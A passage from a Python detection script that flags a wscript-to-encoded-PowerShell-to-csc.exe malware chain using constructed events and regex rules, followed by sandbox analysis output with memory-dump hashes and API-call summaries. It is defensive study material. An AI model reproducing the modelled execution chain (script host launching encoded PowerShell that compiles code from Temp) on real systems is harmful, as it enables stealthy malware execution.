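class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument: base64 over UTF-16LE text, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the command the report redacts.
SAMPLE_SCRIPT = "Add-Type -TypeDefinition $src; Start-Sleep -Seconds 1"
SAMPLE_ENCODED = encode_ps(SAMPLE_SCRIPT)

# Constructed events modelled on Target IDs 1, 3, 12 and 13. Only 6892 and 5612 are
# PIDs the report states; 4321, 7001, 7002 and the benign 8000/8001 are assumed.
EVENTS = [
    ProcEvent(6892, 4321, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"'),
    ProcEvent(5612, 6892, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "'
              + SAMPLE_ENCODED + '"'),
    ProcEvent(7001, 5612, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline"'),
    ProcEvent(7002, 7001, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY '
              r'/MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" '
              r'"c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"'),
    # Constructed benign control: a build tool compiling from a project folder.
    ProcEvent(8001, 8000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\source\repos\App\obj\App.cmdline"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# -e, -ec, -enc, -EncodedCommand and every prefix in between; -ExecutionPolicy does
# not match because the letter after -e must be c or n followed by whitespace.
_ENC_RE = re.compile(r'(?:^|\s)-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# The source-folder rule: a response file (.cmdline) under the user's Temp directory.
_TEMP_SOURCE_RE = re.compile(r'@"?[^"]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline', re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ancestors(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < 32:   # bound against PID-reuse cycles
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: list[ProcEvent]) -> list[dict]:
    """Apply the two lineage rules to a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = _basename(ev.image)
        lineage = [_basename(p.image) for p in _ancestors(ev, by_pid)]
        if name == "powershell.exe" and lineage and lineage[0] in SCRIPT_HOSTS:
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                findings.append({"rule": "script_host_encoded_powershell", "pid": ev.pid,
                                 "parent": lineage[0], "decoded": decoded})
        if name == "csc.exe" and _TEMP_SOURCE_RE.search(ev.cmdline):
            findings.append({"rule": "csc_compile_from_temp", "pid": ev.pid,
                             "lineage": lineage,
                             "under_powershell": "powershell.exe" in lineage})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

On a real host the events come from Sysmon event ID 1 or Security 4688 with command-line auditing enabled; without the decode step a rule sees only base64, which is why the "Suspicious Execution of Powershell with Base64" style of detection fires on the flag itself and the content check has to happen afterwards.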

                  Execution Graph

                  Execution Coverage:9.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:101
                  Total number of Limit Nodes:10
                  execution_graph (rendered graph removed; flattened node/edge list summarised)
                  • Roots in the 07E6xxxx region (7e618d3, 7e63878, 7e69d00) resolve to SetThreadUILanguage (7e63028, 7e63038, 7e61d74 -> 7e65c08) and, through 7e690d7/7e690e8 -> 7e68fc0/7e68f91, to GetFileAttributesW in the 033Cxxxx region (33c4278, 33c4288, 33c4340, 33c4331, 33c43b8, 33c43a8, 33c4948, 33c3f9c -> 33c4df0)
                  • Root 33c1770 resolves to GetFileAttributesW through 33c4278/33c4288
                  • Root 33cdde0 -> 33cc5b4 / 33cde88 / 33cdedc resolves to CreateFileW
                  • Every API reached from these regions is one of SetThreadUILanguage, GetFileAttributesW or CreateFileW (compare the per-function API lists below)
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23fad27d29a08ba40ccb7439bda974c1e9bfe2a772e59be4adfe8f88206972b4
                  • Instruction ID: b8d12302e82cccca873c72b67cf83a7084fca41c08b5419dde941a91650a5435
                  • Opcode Fuzzy Hash: 23fad27d29a08ba40ccb7439bda974c1e9bfe2a772e59be4adfe8f88206972b4
                  • Instruction Fuzzy Hash: 73A18C74614285CFEB18DB24C498BAEBBE2BF88305F14856CD4069B7A1DB78ED45CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 7e01253 .. 7e0160e; no API call inside the function
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: l2Xk$l2Xk
                  • API String ID: 0-602142042
                  • Opcode ID: 0ae7509e9cf329d641473672b5150771e5784e6f1439ea18a219aae8eada7fca
                  • Instruction ID: 2f5f20c81965d3c5581325ff74adc889864e3b759b2efc1560d9836e9c1941f8
                  • Opcode Fuzzy Hash: 0ae7509e9cf329d641473672b5150771e5784e6f1439ea18a219aae8eada7fca
                  • Instruction Fuzzy Hash: 93A1D7B0B05219ABC714DB98C550A5DB3E2EF89718F26805DEA06BF790DB71AC42CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 33cdde0 .. 33cdf3d; the entry block calls 33cc5b4; CreateFileW is called in block 33cdedc-33cdf17, which has two successors (33cdf19-33cdf1f and 33cdf20-33cdf3d)
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 094be79c429d0ed395f2f97b9105f69c9aa58ee1363689492f959a773938c65a
                  • Instruction ID: 6733015f8519f9b6ebbfba025e0b7984c9e9955624e089c98b75e8020ce1a3ed
                  • Opcode Fuzzy Hash: 094be79c429d0ed395f2f97b9105f69c9aa58ee1363689492f959a773938c65a
                  • Instruction Fuzzy Hash: 2541DF71A0424D9FDB00DFA9D845BAEFFB5FB48314F05C12AE608AB381D775A840CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 33cde80 .. 33cdf3d; CreateFileW is called in block 33cdedc-33cdf17, which has two successors (33cdf19-33cdf1f and 33cdf20-33cdf3d)
                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,033CDDFF,00000000,00000000,00000003,00000000,00000002), ref: 033CDF0A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 9e12e100b8443b8f1101742b61c3be48218ed193bb34e30d7a76cd3ec689385a
                  • Instruction ID: 3ed76971bc161e226bbe81a497ddc66bc00d1358f4c6ab7337198ced563c36ab
                  • Opcode Fuzzy Hash: 9e12e100b8443b8f1101742b61c3be48218ed193bb34e30d7a76cd3ec689385a
                  • Instruction Fuzzy Hash: 432149B2D0065D9FCF10CF99D884ADEFBB4FB48314F04822AE918A7610C775A954CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 33cc5b4 .. 33cdf3d; CreateFileW is called in block 33cdedc-33cdf17, which has two successors (33cdf19-33cdf1f and 33cdf20-33cdf3d)
                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,033CDDFF,00000000,00000000,00000003,00000000,00000002), ref: 033CDF0A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 833b62a34f73ca4d5f101cf68f740964eeb7f7860a14aba7ce007e7831379536
                  • Instruction ID: 873f2316ac9a324e315d3002bc0af69b800e3484c084384fad339289f1a864e2
                  • Opcode Fuzzy Hash: 833b62a34f73ca4d5f101cf68f740964eeb7f7860a14aba7ce007e7831379536
                  • Instruction Fuzzy Hash: D82134B2D0025DAFCB10CF99D884ADEFBB4FB48310F04822AE918A7610D775A954CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 33c4de8 .. 33c4e93; GetFileAttributesW is called in block 33c4e42-33c4e6d, which has two successors (33c4e6f-33c4e75 and 33c4e76-33c4e93)
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000), ref: 033C4E60
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 1155e86990caf5269f9a55ace4bbbce9075a0c311a0dd57f7ec0d496db02797d
                  • Instruction ID: d597616e6c7ac886bc7f222fb66ffc89b68b3adad33b5fa9d84f666da4f9c0b3
                  • Opcode Fuzzy Hash: 1155e86990caf5269f9a55ace4bbbce9075a0c311a0dd57f7ec0d496db02797d
                  • Instruction Fuzzy Hash: 4A1156B1D006598FCB10CFAAD484BDEFBB4FB48324F05812AD918B7600D774AA05CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (rendered graph removed; flattened edge list summarised)
                  • Basic blocks 33c3f9c .. 33c4e93; GetFileAttributesW is called in block 33c4e42-33c4e6d, which has two successors (33c4e6f-33c4e75 and 33c4e76-33c4e93)
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000), ref: 033C4E60
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: d62b6fc6ad6d1d88a8d6b4995e8ed85549d22bc2299a938851400245705eceb6
                  • Instruction ID: f4c2ff1bf47750c2ad24916392fdb4dfccb60e9ce773a70ac0337d3ec69c29c6
                  • Opcode Fuzzy Hash: d62b6fc6ad6d1d88a8d6b4995e8ed85549d22bc2299a938851400245705eceb6
                  • Instruction Fuzzy Hash: 022167B0C0065D8BCB10CFAAD8847DEFBB4FB48324F05811AD918B3200D774A900CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph
                  • Rendered graph figure (legend: Executed / Not Executed) not reproduced; three basic blocks from 7e61d74 to 7e65c9a, with the SetThreadUILanguage call in block 7e61d74-7e65c77
                  APIs
                  • SetThreadUILanguage.KERNELBASE ref: 07E65C6A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186712071.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e60000_powershell.jbxd
                  Similarity
                  • API ID: LanguageThread
                  • String ID:
                  • API String ID: 243849632-0
                  • Opcode ID: ca2994c0d34c97decb16ee55b758e172c534f081dcd52b2f17d101e7fc088895
                  • Instruction ID: c9d89487f34214c272230d7c44b16b40afaef7e62fb88b4a09e34d95e3d064e9
                  • Opcode Fuzzy Hash: ca2994c0d34c97decb16ee55b758e172c534f081dcd52b2f17d101e7fc088895
                  • Instruction Fuzzy Hash: 3A1145B09007598FDB10DF99C488BEEFBF4EB48324F10845AD558B3200C379A944CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5301e35f1e124f2a5da4e17debb104fea462b32382d01f6a0383354dd24beeaa
                  • Instruction ID: f7052c03c47e3b425f8def63366beea03b4281f77d68b47f9792d034bae5eb7d
                  • Opcode Fuzzy Hash: 5301e35f1e124f2a5da4e17debb104fea462b32382d01f6a0383354dd24beeaa
                  • Instruction Fuzzy Hash: C7A1E5B17052599FCB24CF64C440AAAB7E2EFC9318F15806AE9499B391DB31DCD1CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac7a619bebac25897dc94f0cdd0e99e75a34f8ef77c993cff11fca05224ea665
                  • Instruction ID: b1743bccc7e6a7426466cccdb4cbd12550c15ae54c8a3ee403bc392dd5b79b6f
                  • Opcode Fuzzy Hash: ac7a619bebac25897dc94f0cdd0e99e75a34f8ef77c993cff11fca05224ea665
                  • Instruction Fuzzy Hash: FD51C5B1602209CFCF24CF54C544BAAB7E2AF48318F159069E909AB7A1C731ECC1CBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbad9eaf244d77e1fb48e31d9b393be938214c79f5d15187df929ec6f34fc1fb
                  • Instruction ID: 2aa4534919ab3d16a7f78e33e328249fa27da75e297640eb813ac3579922d8e2
                  • Opcode Fuzzy Hash: dbad9eaf244d77e1fb48e31d9b393be938214c79f5d15187df929ec6f34fc1fb
                  • Instruction Fuzzy Hash: F501F5A1A0A3C29FC31343791824695AFA29FC755472900A7C141CF7E7CA318C89C3E2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186712071.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e60000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: Mh$ah
                  • API String ID: 0-3820676340
                  • Opcode ID: 9cd94e4e4a8f2d267c16cca2352e079e4936bf085de261b4bca5bbd50cbc5ad2
                  • Instruction ID: 9aa47c9a5b9b0542954877cac8442f784b57259b4cd9ea5b87646c22d35b7fba
                  • Opcode Fuzzy Hash: 9cd94e4e4a8f2d267c16cca2352e079e4936bf085de261b4bca5bbd50cbc5ad2
                  • Instruction Fuzzy Hash: 3B32AEB0A012098FCB14DFA4D4849AEB7F2EF89344F15846AD44ADB765DF34EC46CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: l2Xk$l2Xk$l2Xk$l2Xk
                  • API String ID: 0-3784031231
                  • Opcode ID: aa260232fb1b35a3347ceacd24b50b25501f48d183906f98b89e388385b343eb
                  • Instruction ID: 0ab2a85bd3377b27d375ebff701d680f6ee7d758196730937974f892e98ec7e7
                  • Opcode Fuzzy Hash: aa260232fb1b35a3347ceacd24b50b25501f48d183906f98b89e388385b343eb
                  • Instruction Fuzzy Hash: FF41D7B0B01245AFD754DF58C550AAD77E2EFC9314F158029E906AF790DB72DC82CB91
                  Uniqueness

                  Uniqueness Score: -1.00%